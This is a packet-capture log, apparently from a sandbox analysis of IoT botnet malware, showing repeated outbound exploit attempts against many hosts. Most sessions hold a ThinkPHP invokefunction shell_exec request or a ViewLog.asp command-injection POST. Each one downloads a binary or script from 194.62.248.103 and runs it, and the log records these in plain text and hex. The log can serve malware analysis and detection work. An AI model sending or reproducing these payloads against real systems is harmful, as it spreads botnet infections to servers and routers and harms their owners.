                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:23 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:23 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 33 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 32 33 26 23 34 36 3b 32 37 38 31 33 64 66 65 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 33 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 32 33 26 23 34 36 3b 32 37 38 31 33 64 66 65 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;53757b5c&#46;1713105323&#46;27813dfe<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;53757b5c&#46;1713105323&#46;27813dfe</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        163192.168.2.233747695.163.236.12680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.038587093 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:23.381643057 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:35:23 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        164192.168.2.235742094.23.79.878080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.252239943 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:24.706358910 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.433919907 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.985553026 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:36.896572113 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:50.718663931 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:18.874665022 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        165192.168.2.233681031.136.96.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.567192078 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:24.546283007 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.465915918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:30.501375914 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:38.176326036 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:53.534229994 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.017812014 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        166192.168.2.233918094.120.223.128080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.593517065 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        167192.168.2.235209831.200.87.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.596126080 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        168192.168.2.234963694.122.192.98080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.599849939 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        169192.168.2.235621695.86.104.468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.607912064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        170192.168.2.2353206112.29.70.14080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.701803923 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        171192.168.2.2353004112.182.247.18980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:24.378774881 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:25.890254021 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:27.681751966 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:31.265278101 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:38.432301044 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:52.766336918 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.970066071 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        172192.168.2.2353222112.29.70.14080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:24.456887960 CEST1289INHTTP/1.0 400 Bad RequestCache-Control: no-cacheConnection: closeContent-Length: 1604Content-Type: text/html<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>400</title><style type="text/css">body { background-color: #f3f3f4; color: #676a6c; height: 100%; font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";}.middle-box { max-width: 600px; z-index: 100; margin: 0 auto; padding-top: 40px; text-align: center;}.middle-box h1 { font-size: 170px; font-weight: 100; margin-top: 20px; margin-bottom: 10px;}.btn { border-radius: 3px; font-size: inherit; display: inline-block; width: 100px; height: 30px; line-height: 30px; background-color: #1ab394; border-color: #1ab394; color: #fff; cursor: pointer; font-size: 14px;}.btn:hover { background-color: #1c8570;}.btn:active { background-image: none; outline: 0; -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);}.buttons { margin-top: 30px;}</style></head><body> <div class="middle-box"> <h1>
                                                        Data Raw:
                                                        Data Ascii:
                                                        Apr 14, 2024 16:35:24.456907988 CEST428INData Raw: 30 30 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 62 6f 6c 64 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 33 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64
                                                        Data Ascii: 00</h1> <h3 class="font-bold">Bad Request</h3> <div class="error-desc"></div> <div class="buttons"><a class="btn btn-primary" onclick="javascrip


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        173192.168.2.235217288.249.14.16280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.030865908 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        174192.168.2.235779031.136.67.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.304958105 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:27.297801018 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.249815941 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:33.313029051 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
